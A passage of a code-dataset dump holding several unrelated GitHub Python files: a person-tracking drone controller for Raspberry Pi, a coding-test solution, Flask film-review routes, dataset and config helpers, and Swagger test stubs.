500, 150 + y * 500)\n painter.setPen(Qt.red)\n for point in self.upperPoint:\n x = point[0]\n y = point[1]\n painter.drawPoint(600 + x * 500, 150 + y * 500)\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = Win()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"eeeXun/homework","sub_path":"semester4/algorithm2-2/demo3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70198406821","text":"import math\nfrom collections import Counter\n\n \n\ndef solution(str1, str2):\n \n str1 = str1.upper()\n str2 = str2.upper()\n\n tmp = []\n tmp2 = []\n\n for i in range(0, len(str1)-1):\n if str1[i] == ' ' or str1[i+1] == ' ':\n continue\n if str1[i].isdigit() or str1[i+1].isdigit():\n continue\n if not(str1[i].isalpha()) or not(str1[i+1].isalpha()):\n continue\n\n tmp.append( str1[i] + str1[i+1] ) \n\n for i in range(0, len(str2)-1):\n if str2[i] == ' ' or str2[i+1] == ' ':\n continue\n if str2[i].isdigit() or str2[i+1].isdigit():\n continue\n if not(str2[i].isalpha()) or not(str2[i+1].isalpha()):\n continue\n\n tmp2.append( str2[i] + str2[i+1] )\n\n \n #print(tmp)\n #print(tmp2)\n\n\n if len(tmp) == 0 and len(tmp2) == 0: # 숫자나 공백, 특문때문에 전부 제거된 경우 예외처리 \n ans = 65536\n return ans\n else:\n c1 = Counter(tmp)\n c2 = Counter(tmp2)\n \n intersec = c1 & c2\n intersec = sum(list(intersec.values()))\n union = c1 | c2\n union = sum(list(union.values()))\n \n ans = intersec/union * 65536\n '''\n common = 0\n\n adding = 0\n\n \n\n tmp3 = tmp2\n\n # 두 리스트 공통 찾는 로직 ( set을 쓸 수가 없음 )\n\n for i in range(len(tmp)):\n for j in range(len(tmp3)):\n if tmp[i] == tmp3[j]:\n common += 1\n tmp3[j] == ''\n break\n\n \n\n adding = len(tmp) + len(tmp2) - common\n\n \n\n a = common\n\n b = adding\n \n #print(common, adding)\n\n ans = a/b * 65536\n\n ans = math.floor(ans) # 내림 \n\n '''\n\n '''\n\n tmp = set(tmp)\n\n tmp2 = set(tmp2)\n\n \n\n print(tmp)\n\n print(tmp2)\n\n \n\n a = len(tmp & tmp2) # 교집합\n\n b = len(tmp | tmp2) # 합집합\n\n \n\n ans = a/b * 65536\n\n '''\n\n #print(int(ans))\n return int(ans)\n\n\n#solution('FRANCE', 'french') \n#solution('handshake', 'shake hands')\n#solution('aa1+aa2', 'AAAA12') \n#solution('E=M*C^2', 'e=m*c^2')\n","repo_name":"JuyeolRyu/CodingTest","sub_path":"백수/algorithm/카카오/2018 KaKao Blind Recruitment/young/[1차] 뉴스 클러스터링/[1차] 뉴스 클러스터링.py","file_name":"[1차] 뉴스 클러스터링.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"71186578661","text":"import tflite_runtime.interpreter as interpreter\nimport numpy as np\nimport RPi.GPIO as GPIO\nimport cv2 as cv\nimport sys\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport smbus2\nfrom centroidtracker import CentroidTracker\nfrom threading import Thread\nfrom picamera2 import Picamera2\n\nclass VideoStream:\n def __init__(self):\n global imgW,imgH\n self.piCam = Picamera2()\n self.piCam.configure(self.piCam.create_preview_configuration())\n self.piCam.start()\n self.frame = []\n self.stopEx = False\n imgH,imgW = self.piCam.capture_array().shape[:2]\n # def start(self): #to run on a separate thread\n # Thread(target=self.update,args=()).start()\n # return self\n\n # def update(self):\n # while not self.stopEx:\n # self.frame = self.piCam.capture_array()[:,:,:3]\n\n def update(self):\n self.frame = cv.rotate(self.piCam.capture_array()[:,:,:3],cv.ROTATE_180)\n \n def getInstance(self):\n return self\n\n def read(self):\n return np.array(self.frame.copy())\n\n def stop(self):\n self.stopEx = True\n \nclass Detect:\n def __init__(self, stream):\n global imgW,imgH\n labels = 'labelmap.txt'\n model_path = 'detect.tflite'\n \n self.is_tracking = False #TODO\n\n self.stream = stream\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=4)\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n input_tensor_index = self.input_details[0]['index']\n\n self.mean = 127.5\n self.std = 127.5\n\n self.frame = []\n while len(self.frame) == 0:\n self.frame = stream.read()\n\n self.imgW_resize = 300 #frame.shape[1]\n self.imgH_resize = 300 #frame.shape[0]\n\n # config = np.array([1,self.imgH_resize,self.imgW_resize,3],dtype=np.int32)\n # model.resize_tensor_input(input_tensor_index, config)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.confidence_thresh = 0.52\n self.boxes_id, self.classes_id, self.scores_id = 0, 1, 2\n\n self.stopped = False\n\n self.label = ''\n with open(labels,'r') as f:\n self.label = f.read()\n\n self.label = self.label.split('\\n')\n if self.label[0] == '???':\n del(self.label[0])\n def getInstance(self):\n return self\n def start(self,poly=None):\n self.stopped = False\n print(\" Started tracking .........\")\n self.ct = CentroidTracker()\n Thread(target=self.detect,args=(poly,)).start()\n\n def isIn(self,rects,points,cd = False):\n \n for i,(xmin,ymin,xmax,ymax) in enumerate(rects):\n flag = False\n for x,y in points:\n if x < xmin or x > xmax or y < ymin or y > ymax:\n flag = True\n break\n if not flag:\n if cd:\n dist = math.dist(((xmin+xmax)/2,(ymin+ymax)/2),points[0])\n print('distance -> ',dist)\n if dist < 30:\n return i\n continue\n return i\n return -1\n def detect(self,poly=None):\n global is_tracking,bbox_coordinates\n self.poly = poly\n locked_on = False\n if self.poly == None:\n is_tracking = False\n triggerDetection()\n\n global frames\n id = -1\n while not self.stopped:\n self.frame = self.stream.read()\n frame_inp = self.frame.copy()\n frame_inp = cv.resize(frame_inp,(self.imgW_resize,self.imgH_resize),cv.INTER_AREA)\n if self.input_details[0]['dtype'] == np.float32:\n frame_inp = (frame_inp - self.mean)/self.std\n frame_inp = np.expand_dims(frame_inp,axis=0)\n \n self.model.set_tensor(self.input_details[0]['index'],frame_inp)\n self.model.invoke()\n\n boxes = self.model.get_tensor(self.output_details[self.boxes_id]['index'])[0]\n 
classes = self.model.get_tensor(self.output_details[self.classes_id]['index'])[0]\n scores = self.model.get_tensor(self.output_details[self.scores_id]['index'])[0]\n\n scores_sorted = list(reversed(np.argsort(scores,axis=0)))\n \n\n d_rects = []\n # print(scores_sorted)\n for i in scores_sorted[:4]:\n # print('detected -> ',classes[i])\n if (scores[i] < self.confidence_thresh or scores[i] > 1.0) or int(classes[i]) != 0:\n continue\n ymin = int(max(1,imgH*boxes[i][0]))\n xmin = int(max(1,imgW*boxes[i][1]))\n ymax = int(min(imgH,imgH*boxes[i][2]))\n xmax = int(min(imgW,imgW*boxes[i][3]))\n if id == -1:\n cv.rectangle(self.frame,(xmin,ymin),(xmax,ymax),(255,0,0),3)\n d_rects.append([xmin,ymin,xmax,ymax])\n\n if id == -1:\n id = self.isIn(d_rects,self.poly)\n if id == -1 and not is_tracking:\n is_tracking = False\n triggerDetection()\n\n objects = self.ct.update(rects=d_rects)\n \n # if locked_on and id not in list(objects.keys()):\n # is_tracking = False\n # triggerDetection()\n #print('id -> ',id,' poly -> ',self.poly,' rects -> ',d_rects)\n if not locked_on and id != -1:\n id = int(list(objects.keys())[id])\n locked_on = True\n \n else:\n try:\n centroid = objects[id]\n text = \"Tracking tis idiot {}\".format(id)\n cv.putText(self.frame, text, (centroid[0] - 10, centroid[1] - 10),cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv.circle(self.frame, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n\n except:\n is_tracking = False\n triggerDetection()\n \n if locked_on:\n rect_id = self.isIn(d_rects,list([objects[id]]),cd=True)\n if(rect_id != -1):\n cv.rectangle(self.frame,d_rects[rect_id][:2],d_rects[rect_id][-2:],(255,0,0),3)\n bbox_coordinates = (d_rects[rect_id][:2],d_rects[rect_id][-2:])\n # if not self.is_tracking:\n # pass #TODO\n\n frames['detection'] = self.frame\n\n def stop(self):\n self.stopped = True\n\nclass PoseDetection: # 0 - jesus pose\n def __init__(self,stream):\n global imgW,imgH,is_tracking\n self.stream = stream\n \n model_path = 'pose.tflite'\n self.model = interpreter.Interpreter(model_path=model_path,num_threads=2)\n self.model.allocate_tensors()\n\n self.input_details = self.model.get_input_details()\n self.output_details = self.model.get_output_details()\n\n self.input_index = self.input_details[0]['index']\n self.output_index = self.output_details[0]['index']\n\n self.stopped = False\n\n self.imgH_resize,self.imgW_resize = self.input_details[0]['shape_signature'][1:3]\n print(self.imgH_resize,self.imgW_resize)\n print('\\n')\n print(imgW,imgH)\n # print(self.input_details)\n # print('\\n')\n # print(self.output_details)\n def getInstance(self):\n return self\n\n def start(self):\n self.stopped = False\n print(\" Started detecting pose .........\")\n Thread(target=self.getPose,args=()).start()\n\n def getRect(self):\n return self.rect\n\n def getPose(self):\n global frames,is_tracking,imgW,imgH\n hw = [imgH,imgW]\n while not self.stopped:\n frame = self.stream.read()\n frame_inp = cv.resize(frame,(self.imgH_resize,self.imgW_resize),interpolation=cv.INTER_AREA)\n frame_inp = np.array(np.expand_dims(frame_inp,axis=0),dtype=np.float32)\n\n self.model.set_tensor(self.input_index,frame_inp)\n self.model.invoke()\n\n keypoints = self.model.get_tensor(self.output_index)[0][0]\n for i, keypoint in enumerate(keypoints):\n keypoints[i][:2] = np.multiply(keypoint[:2],hw)\n # print('keypoints -> ',keypoints[i][:2])\n # print(keypoints)\n self.rect = self.estimatePose(keypoints)\n if(self.rect != None):\n # print('detected ')\n is_tracking = True\n triggerDetection()\n\n for 
keypoint in keypoints:\n if keypoint[2] < 0.3:\n continue\n cv.circle(frame,(int(keypoint[1]),int(keypoint[0])),4,(255,0,0),-1)\n frames['detection'] = frame\n\n \n def estimatePose(self,keypoints):\n points = np.arange(5,11)\n for point in points:\n if keypoints[point][2] < 0.4:\n return None\n dist_wrists = math.dist(keypoints[9][:2], keypoints[10][:2])\n dist_sum = math.dist(keypoints[5][:2],keypoints[6][:2])\n for i in range(2):\n dist_sum += math.dist(keypoints[5+i*2][:2],keypoints[5+(i+1)*2][:2])\n dist_sum += math.dist(keypoints[6+i*2][:2],keypoints[6+(i+1)*2][:2])\n if abs(dist_sum - dist_wrists) < dist_sum/7:\n return [keypoints[5][:2],keypoints[6][:2],keypoints[11][:2],keypoints[12][:2]]\n return None\n \n def stop(self):\n self.stopped=True\n\nclass PID:\n def __init__(self):\n global imgW, imgH,prev_box_mid\n self.kp = 0.5\n self.kd = 0.3\n self.ki = 0.001\n self.center = prev_box_mid = [imgW//2,imgH//2]\n self. total_area = imgW*imgH\n self.prev_time = time.time()\n\n def calcPID(self):\n global bbox_coordinates,prev_box_mid,curr_mid, prev_area\n curr_area = abs(bbox_coordinates[0][0] - bbox_coordinates[1][0])*abs(bbox_coordinates[0][1] - bbox_coordinates[1][1])\n curr_mid = ((bbox_coordinates[0][0]+bbox_coordinates[1][0])/2,(bbox_coordinates[0][1]+bbox_coordinates[1][1])/2)\n\n # Pid correction -> rudder\n errorX = self.center[0] - curr_mid[0]\n dx = curr_mid[0] - prev_box_mid[0]\n dt = time.time() - self.prev_time\n\n pidPX = int(self.kp*errorX)\n pidDX = int(self.kd*dx/dt)\n pidIX = 0\n if abs(errorX) < 50:\n pidIX = int(self.ki*errorX)\n prev_box_mid = curr_mid\n pid_rudder = pidDX + pidDX + pidIX\n\n errorZ = self.total_area - curr_area\n dz = curr_area - prev_area\n pidPZ = int(errorZ/1000)\n pidDZ = int(self.kd*dz/dt)\n pid_alieron = pidPZ + pidDZ\n\n self.prev_time = time.time()\n if curr_area > 0.4*self.total_area:\n pid_alieron = 0\n\n return pid_rudder,pid_alieron\n \n\ndef triggerDetection():\n global detect,pdetect,is_tracking,switch_state\n if is_tracking:\n poly = pdetect.getRect()\n pdetect.stop()\n detect.start(poly) \n switch_state = 1\n else:\n detect.stop()\n pdetect.start()\n switch_state=0\n\ndef read_from_arduino():\n global data,data_available\n try:\n data = bus.read_i2c_block_data(ADDR,0,30)\n data = [chr(s) for s in data]\n data = ''.join(data).split('#')\n data = data[1:-1]\n # print(data)\n data = [int(x) for x in data]\n data_available = True\n except:\n print('An error has occurred')\n data_available = False\n\ndef write_to_arduino(data):\n global switch_state\n data = data.copy()\n if len(data) > 2:\n data.append(switch_state)\n data_str = '#'.join(map(str,data))\n data = list(bytes(data_str,'utf-8'))\n print(data_str,data)\n try:\n bus.write_i2c_block_data(ADDR, 0, data)\n except:\n print('error')\n\ndef record_footage():\n global frames,stream\n output= cv.VideoWriter('footage',cv.VideoWriter_fourcc(*'XVID'),25,frames['detection'])\n \n while not stream.stopEx:\n output.write(frames['detection'])\n output.release()\n\n\ndef isr(channel): \n global pdetect,detect,data_available,is_tracking\n # print('#########################test############################') \n if GPIO.input(channel):\n ctr = 0\n while not data_available and ctr < 10:\n read_from_arduino()\n ctr+=1\n if data_available:\n triggerDetection()\n else:\n data_available=False\n pdetect.stop()\n detect.stop()\n is_tracking=False\n write_to_arduino([0])\n\n######################### without external mcu\n\n# def calcPWM(channel):\n# global pwm_vals,pwm_counts\n# if 
GPIO.input(channel):\n# started = time.time()\n# else:\n# pulse_width = time.time()-started\n# pwm_vals[channel] += pulse_width\n# pwm_counts[channel] += 1\n\n# def getPWM():\n# global pwm_in,pwm_counts\n# GPIO.add_event_detect(pwm,GPIO.BOTH,calcPWM)\n# sleep(3)\n# GPIO.remove_event_detect(pwm)\n# if 0 in pwm_counts.values():\n# return False\n# pwm_vals = {x:float(pwm_vals[x]/pwm_counts[x]) for x in list(pwm_vals.keys())}\n# print(pwm_vals)\n# return True\n#pins normally high -> 3,5,7,24,26\n#pins 13 and 15\n# switch_pin = 3\n# pwm_in = (10,11,12,13,15) #pins for reading pwm signals -> (aileron, rudder)\n# pwm_out = (5,7,24,26,16)\n# pwm_vals = {10:1000,11:1000,12:1000,13:1000,15:1000}\n# pwm_counts = {10:0,11:0,12:0,13:0,15:0}\n\n#########################\nADDR = 0x09\ninterrupt = 7\n\nimgW = imgH = 0\nis_tracking = False\nframes = dict({'detection' : np.ones(shape=(640,480,3),dtype=np.float32)})\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(interrupt,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n\nGPIO.add_event_detect(interrupt,GPIO.BOTH,isr)\n\nbus = smbus2.SMBus(1)\n######################## without external mcu\n\n# GPIO.setup(pwm_in,GPIO.IN,pull_up_down=GPIO.PUD_DOWN)\n# GPIO.setup(pwm_out,GPIO.OUT)\n# GPIO.output(pwm_out,GPIO.LOW)\n########################\n\ndata_available = False #input pwm values from arduino\ndata=[0] #format - option, rudder, elevator, aileron, gps select\nswitch_state = 0\n\nbbox_coordinates = [[0,0],[0,0]]\nprev_box_mid = (0,0)\nprev_area = imgH*imgW\n\nstream = VideoStream().getInstance()\nstream.update()\ntime.sleep(1)\npdetect = PoseDetection(stream=stream).getInstance()\ndetect = Detect(stream=stream).getInstance()\npid = PID()\n# print(detect,pdetect)\n\nprev_time = time.time()\n\n# Thread(target=record_footage,args=()).start() # uncomment for enabling video recording\nwhile True:\n stream.update()\n cv.imshow('detected',cv.cvtColor(frames['detection'],cv.COLOR_BGR2RGB))\n\n if(data_available):\n PidX,PidZ = pid.calcPID()\n PidX = -PidX\n # print(Pid)\n dup_data = data.copy()\n dup_data[1] += PidX\n # dup_data[3] += PidZ #Enable for aileron control\n # i2c_time = time.time()\n if(time.time() - prev_time > 0.50):\n write_to_arduino(dup_data)\n prev_time = time.time()\n # print('i2c time :',(time.time()-i2c_time)*1000)\n # print(is_tracking)\n if cv.waitKey(10) & 0xFF == 27 :\n stream.stop()\n pdetect.stop()\n detect.stop()\n break\nGPIO.cleanup()\ncv.destroyAllWindows()","repo_name":"kevinjacb/computer_vision_drone","sub_path":"fcCode.py","file_name":"fcCode.py","file_ext":"py","file_size_in_byte":15676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"4218743940","text":"\"\"\"Courseware constants\"\"\"\n\nPLATFORM_EDX = \"edx\"\n# List of all currently-supported openedx platforms\nOPENEDX_PLATFORMS = (PLATFORM_EDX,)\n# Currently-supported openedx platforms in a ChoiceField-friendly format\nOPENEDX_PLATFORM_CHOICES = zip(OPENEDX_PLATFORMS, OPENEDX_PLATFORMS)\nEDX_ENROLLMENT_VERIFIED_MODE = \"verified\"\nEDX_ENROLLMENT_AUDIT_MODE = \"audit\"\nEDX_DEFAULT_ENROLLMENT_MODE = EDX_ENROLLMENT_AUDIT_MODE\nEDX_ENROLLMENTS_PAID_MODES = [\n EDX_ENROLLMENT_VERIFIED_MODE,\n]\nPRO_ENROLL_MODE_ERROR_TEXTS = (\n \"The [{}] course mode is expired or otherwise unavailable for course run\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n \"Specified course mode '{}' unavailable for course\".format(\n EDX_DEFAULT_ENROLLMENT_MODE\n ),\n)\n# The amount of minutes after creation that a openedx model record should be eligible for repair\nOPENEDX_REPAIR_GRACE_PERIOD_MINS = 5\n","repo_name":"mitodl/mitxonline","sub_path":"openedx/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"}
+{"seq_id":"38825892415","text":"from application import app, db\nfrom application.models import Review, Film\nfrom flask import render_template, url_for\nfrom flask import redirect, request\nfrom application.forms import AddReview, AddFilm\n\n\n@app.route('/', methods=['GET','POST'])\n\n@app.route('/home', methods=['GET','POST'])\ndef home():\n all_reviews = Review.query.all()\n all_film = Film.query.all()\n print(all_reviews)\n return render_template('home.html', title=\"Home\", all_reviews=all_reviews, all_film=all_film)\n\n@app.route('/addfilm', methods=['GET', 'POST'])\ndef addfilm():\n form = AddFilm()\n if request.method == 'POST':\n if form.validate_on_submit():\n new_film = Film(\n title = form.title.data,\n description = form.description.data,\n released_at = form.released_at.data,\n age_rating = form.age_rating.data\n )\n\n db.session.add(new_film)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('addfilm.html', title=\"Add a Film\", form=form)\n\n\n@app.route('/addreview', methods=['GET','POST'])\ndef addreview():\n form = AddReview()\n form.film_title.choices = [(film.id, film.title) for film in Film.query.all()]\n if request.method == 'POST':\n if form.validate_on_submit():\n new_review = Review(\n film_id = form.film_title.data,\n author = form.author.data,\n review = form.review.data,\n rating = form.rating.data\n )\n\n db.session.add(new_review)\n db.session.commit()\n return redirect(url_for(\"home\"))\n return render_template('add_review.html', title='Add a Review', form=form)\n\n@app.route(\"/update/\", methods=[\"GET\", \"POST\"])\ndef update(id):\n form = AddReview()\n form.film_title.choices = [(title.title) for title in Film.query.all()]\n review = Review.query.filter_by(id=id).first()\n if request.method == \"POST\":\n review.film_title = form.film_title.data\n review.author = form.author.data\n review.review = form.review.data\n review.rating = form.rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"update.html\", form=form, title=\"Update Review\", review=review)\n\n@app.route(\"/updatefilm/\", methods=[\"GET\", \"POST\"])\ndef updatefilm(id):\n form = AddFilm()\n film = Film.query.filter_by(id=id).first()\n if request.method == \"POST\":\n film.title = form.title.data\n film.decription = form.description.data\n film.released_at = form.released_at.data\n film.age_rating = form.age_rating.data\n db.session.commit()\n return redirect(url_for(\"home\"))\n\n return render_template(\"updatefilm.html\", form=form, title=\"Update Film\", film=film)\n\n@app.route('/deletereview/', methods=[\"GET\", \"POST\"])\ndef deletereview(id):\n reviewtodelete = Review.query.get(id)\n db.session.delete(reviewtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/deletefilm/', methods=[\"GET\", \"POST\"])\ndef deletefilm(id):\n filmtodelete = Film.query.get(id)\n db.session.delete(filmtodelete)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/filmlist', methods=['GET','POST'])\ndef filmlist():\n all_films = Film.query.all()\n print(all_films)\n return render_template(\"filmlist.html\", title=\"Film List\", all_films=all_films)\n\n@app.route('/count', methods=[\"GET\", \"POST\"])\ndef count():\n number_of_reviews = Review.query.count()\n print(number_of_reviews)\n db.session.commit()\n return render_template(\"count.html\", title=\"Count\", 
number_of_reviews=number_of_reviews)","repo_name":"sc18kg/first-qa-project","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"26149845883","text":"import pandas as pd\nimport os\nfrom shutil import copyfile\n\nFePh_base_path = \"/Users/chbh01/Documents/OfflineCodebases/DFKI_Hiwi/ACG/EASIER/Datasets/FePh/\"\ny_df = pd.read_csv(os.path.join(FePh_base_path, \"FePh_labels.csv\"))\nimages_dir = os.path.join(FePh_base_path, \"FePh_images\")\n\ndestination_folder = \"FePh_images-single-labels-only\"\nos.makedirs(os.path.join(FePh_base_path, destination_folder))\ny_df.dropna(inplace=True)\n# Extracting multiple labels\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: [int(i) for i in x])\ny_df['num_labels'] = y_df['Facial_label'].apply(lambda x: len(x))\n# Removing all data points with more than one labels ==> Ambiguous\ny_df = y_df[y_df[\"num_labels\"] == 1]\ny_df['Facial_label'] = y_df['Facial_label'].apply(lambda x: x[0]).to_numpy()\nprint(y_df[\"External ID\"].values.shape)\n\nfor f in y_df[\"External ID\"]:\n try:\n copyfile(os.path.join(images_dir, f), os.path.join(FePh_base_path, destination_folder, f))\n except FileNotFoundError:\n copyfile(os.path.join(images_dir, f + \".png\"), os.path.join(FePh_base_path, destination_folder, f + \".png\"))\n\ny_df.to_csv(\"FePh_labels_single_label_only.csv\")\n","repo_name":"DFKI-SignLanguage/EASIER-EkmanClassifier","sub_path":"Scripts/gen_FePh_fullset_onlysinglelabels.py","file_name":"gen_FePh_fullset_onlysinglelabels.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"8022296312","text":"from tkinter import TRUE\r\nimport operator\r\n\r\ndef sort_by_occurrence(nums):\r\n \"\"\"按照 list 物件 nums 里的各元素出现次数,进行递增排序\"\"\"\r\n # 把你的程式码放在这里\r\n a = {} \r\n for i in input_list:\r\n if input_list.count(i)>0:\r\n a[i]= input_list.count(i) #出现次数\r\n a = sorted(a.items(),key=operator.itemgetter(1)) #排序\r\n res = []\r\n for item in a:\r\n res.append(item[0])\r\n return res\r\n\r\nif __name__ == '__main__':\r\n # 只有当这个 py 档案以 Python 直译器执行时,才会执行到以下程式码。\r\n # 若是把这个 py 档案做为模组来汇入,不会执行到以下程式码。\r\n input_list = [7,7,7,8,1,1]\r\n output_list = sort_by_occurrence(input_list)\r\n print(output_list)\r\n\r\n\r\n#留言板","repo_name":"EEB113A/hw3-Code-Review","sub_path":"1070327_王云晨.py","file_name":"1070327_王云晨.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"5641923378","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom flask import json\nfrom six import BytesIO\n\nfrom swagger_server.models.cid import Cid # noqa: E501\nfrom swagger_server.models.componentsresponses_not_foundcontentapplication1problem2_bxmlschema import ComponentsresponsesNotFoundcontentapplication1problem2Bxmlschema # noqa: E501\nfrom swagger_server.models.create_cid_set_file_request import CreateCidSetFileRequest # noqa: E501\nfrom swagger_server.models.create_cid_set_file_response import CreateCidSetFileResponse # noqa: E501\nfrom swagger_server.models.create_sync_verification_request import CreateSyncVerificationRequest # noqa: E501\nfrom swagger_server.models.create_sync_verification_response import CreateSyncVerificationResponse # noqa: E501\nfrom swagger_server.models.get_cid_set_file_response import GetCidSetFileResponse # noqa: E501\nfrom swagger_server.models.get_entry_by_cid_response import GetEntryByCidResponse # noqa: E501\nfrom swagger_server.models.inline_response404 import InlineResponse404 # noqa: E501\nfrom swagger_server.models.key_type import KeyType # noqa: E501\nfrom swagger_server.models.list_cid_set_events_response import ListCidSetEventsResponse # noqa: E501\nfrom swagger_server.test import BaseTestCase\n\n\nclass TestReconciliationController(BaseTestCase):\n \"\"\"ReconciliationController integration test stubs\"\"\"\n\n def test_create_cid_set_file(self):\n \"\"\"Test case for create_cid_set_file\n\n Criar Arquivo de CIDs\n \"\"\"\n body = CreateCidSetFileRequest()\n response = self.client.open(\n '/api/v1-rc5//cids/files/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_create_sync_verification(self):\n \"\"\"Test case for create_sync_verification\n\n Verificar Sincronismo\n \"\"\"\n body = CreateSyncVerificationRequest()\n response = self.client.open(\n '/api/v1-rc5//sync-verifications/',\n method='POST',\n data=json.dumps(body),\n content_type='application/xml')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_cid_set_file(self):\n \"\"\"Test case for get_cid_set_file\n\n Consultar Arquivo de CIDs\n \"\"\"\n headers = [('pi_requesting_participant', 'pi_requesting_participant_example')]\n response = self.client.open(\n '/api/v1-rc5//cids/files/{Id}'.format(id=56),\n method='GET',\n headers=headers)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_get_entry_by_cid(self):\n \"\"\"Test case for get_entry_by_cid\n\n Consultar Vínculo por CID\n \"\"\"\n response = self.client.open(\n '/api/v1-rc5//cids/entries/{Cid}'.format(cid=Cid()),\n method='GET')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n def test_list_cid_set_events(self):\n \"\"\"Test case for list_cid_set_events\n\n Listar Eventos de CIDs\n \"\"\"\n query_string = [('participant', 'participant_example'),\n ('key_type', KeyType()),\n ('start_time', '2013-10-20T19:20:30+01:00'),\n ('end_time', '2013-10-20T19:20:30+01:00'),\n ('limit', 56)]\n response = self.client.open(\n '/api/v1-rc5//cids/events',\n method='GET',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))\n\n\nif __name__ == '__main__':\n import unittest\n 
unittest.main()\n","repo_name":"legiti/pix-dict-api","sub_path":"flask/swagger_server/test/test_reconciliation_controller.py","file_name":"test_reconciliation_controller.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"}
+{"seq_id":"10029945564","text":"import configparser\n\n\nclass AWSIdentity:\n def __init__(self, config_file_path):\n \"\"\"\n Get AWS KEY, SECRET, and TOKEN in config file\n :param config_file_path: Path lead to AWS credential config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.aws_identity = dict()\n\n self.__get_aws_identity()\n\n def __get_aws_identity(self):\n self.aws_identity['aws_key'] = self.config.get('AWS', 'KEY')\n self.aws_identity['aws_secret'] = self.config.get('AWS', 'SECRET')\n self.aws_identity['aws_token'] = self.config.get('AWS', 'TOKEN')\n\n\nclass AWSCluster:\n def __init__(self, config_file_path):\n \"\"\"\n Get all required info for AWS S3, Redshift Cluster, and Database in config file\n :param config_file_path: Path lead to AWS S3, Redshift Cluster, and Database config file\n \"\"\"\n self.config = configparser.ConfigParser()\n self.config.read_file(open(config_file_path))\n self.cluster_info = dict()\n\n self.__get_cluster_info()\n\n def __get_cluster_info(self):\n # Cluster configuration\n self.cluster_info['dwh_cluster_identifier'] = self.config.get(\"DWH\", \"CLUSTER_IDENTIFIER\")\n self.cluster_info['dwh_cluster_type'] = self.config.get(\"DWH\", \"CLUSTER_TYPE\")\n self.cluster_info['dwh_num_nodes'] = self.config.get(\"DWH\", \"NUM_NODES\")\n self.cluster_info['dwh_node_type'] = self.config.get(\"DWH\", \"NODE_TYPE\")\n\n # Database info\n self.cluster_info['dwh_db'] = self.config.get(\"CLUSTER\", \"DB_NAME\")\n self.cluster_info['dwh_db_user'] = self.config.get(\"CLUSTER\", \"DB_USER\")\n self.cluster_info['dwh_db_password'] = self.config.get(\"CLUSTER\", \"DB_PASSWORD\")\n self.cluster_info['dwh_port'] = self.config.get(\"CLUSTER\", \"DB_PORT\")\n self.cluster_info['dwh_host'] = self.config.get(\"CLUSTER\", \"HOST\")\n self.cluster_info['dwh_region'] = self.config.get(\"DWH\", \"REGION\")\n\n # S3 info\n self.cluster_info['s3_log_data'] = self.config.get('S3', 'log_data')\n self.cluster_info['s3_log_jsonpath'] = self.config.get('S3', 'log_jsonpath')\n self.cluster_info['s3_song_data'] = self.config.get('S3', 'song_data')\n\n # IAM role\n self.cluster_info['dwh_iam_role_name'] = self.config.get(\"DWH\", \"IAM_ROLE_NAME\")\n self.cluster_info['dwh_iam_arn'] = self.config.get(\"IAM_ROLE\", \"ARN\")\n\n","repo_name":"xzbits/project3_DE_ND","sub_path":"aws_identity_redshift_cluster_config.py","file_name":"aws_identity_redshift_cluster_config.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
